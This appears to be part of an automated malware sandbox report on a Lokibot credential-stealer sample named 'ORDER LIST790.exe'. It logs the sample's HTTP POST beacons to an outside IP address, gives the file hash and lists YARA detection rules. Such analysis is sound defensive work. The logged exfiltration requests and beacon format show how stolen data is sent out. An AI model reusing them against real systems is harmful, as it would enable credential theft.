                                      Date: Thu, 11 Aug 2022 03:37:23 GMT
                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Content-Length: 5017
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.34974266.29.145.16280C:\Users\user\Desktop\ORDER LIST790.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 11, 2022 05:37:26.351785898 CEST1028OUTPOST /?112233 HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 66.29.145.162
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 6B020D42
                                      Content-Length: 190
                                      Connection: close
                                      Aug 11, 2022 05:37:27.252741098 CEST1030INHTTP/1.1 200 OK
                                      Date: Thu, 11 Aug 2022 03:37:26 GMT
                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Content-Length: 5017
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.34974366.29.145.16280C:\Users\user\Desktop\ORDER LIST790.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 11, 2022 05:37:28.256445885 CEST1034OUTPOST /?112233 HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 66.29.145.162
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 6B020D42
                                      Content-Length: 163
                                      Connection: close
                                      Aug 11, 2022 05:37:29.144061089 CEST1036INHTTP/1.1 200 OK
                                      Date: Thu, 11 Aug 2022 03:37:28 GMT
                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Content-Length: 5017
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,


                                      Click to jump to process

                                      Target ID:0
                                      Start time:05:37:04
                                      Start date:11/08/2022
                                      Path:C:\Users\user\Desktop\ORDER LIST790.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\ORDER LIST790.exe"
                                      Imagebase:0xeb0000
                                      File size:872960 bytes
                                      MD5 hash:80E4B72D26806ED5F245142166A48145
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Target ID:4
                                      Start time:05:37:18
                                      Start date:11/08/2022
                                      Path:C:\Users\user\Desktop\ORDER LIST790.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\ORDER LIST790.exe
                                      Imagebase:0xa80000
                                      File size:872960 bytes
                                      MD5 hash:80E4B72D26806ED5F245142166A48145
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low

                                      No disassembly